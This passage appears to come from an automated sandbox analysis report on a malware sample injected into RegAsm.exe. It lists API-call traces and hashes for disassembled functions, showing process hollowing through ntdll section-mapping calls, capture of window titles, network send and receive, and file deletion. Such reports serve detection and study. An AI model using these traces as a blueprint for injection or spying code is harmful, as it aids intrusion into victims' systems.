                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                                                          • _free.LIBCMT ref: 0044F050
                                                                                                                          • _free.LIBCMT ref: 0044F086
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2991157371-0
                                                                                                                          • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                                                                                          • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                                                                                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                            • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                                                                            • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                            • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                                                                            • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                                                                                            • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                                                                                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                                                                                          • _free.LIBCMT ref: 10006CD7
                                                                                                                          • _free.LIBCMT ref: 10006D0D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorLast_abort
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2991157371-0
                                                                                                                          • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                          • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                                                                                          • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                                                                                          • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                                                                                          APIs
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2279764990-0
                                                                                                                          • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                          • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                                          • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                                          • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                                          APIs
                                                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                            • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateEventStartupsocket
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1953588214-0
                                                                                                                          • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                          • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                                          • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                          • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                          • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                          • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                          • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                          APIs
                                                                                                                          • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                          • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3750050125-0
                                                                                                                          • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                          • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                          • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                          • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                          APIs
                                                                                                                          • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$ForegroundText
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 29597999-0
                                                                                                                          • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                          • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                          • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                          • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 806969131-0
                                                                                                                          • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                          • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                          • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                          • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 806969131-0
                                                                                                                          • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                          • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                          • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                          • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                            • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                            • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                            • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                            • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                          • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                          • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2948481953-0
                                                                                                                          • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                          • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                                                          • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                          • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                                                          APIs
                                                                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __crt_fast_encode_pointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3768137683-0
                                                                                                                          • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                          • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                          • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                          • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                          • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                          • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                          • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __alldvrm
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 65215352-0
                                                                                                                          • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                          • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                          • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                          • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                          APIs
                                                                                                                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Startup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 724789610-0
                                                                                                                          • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                          • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                                                          • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                          • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                                                          APIs
                                                                                                                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Deallocatestd::_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1323251999-0
                                                                                                                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: recv
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1507349165-0
                                                                                                                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: send
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2809346765-0
                                                                                                                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                                                          APIs
                                                                                                                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
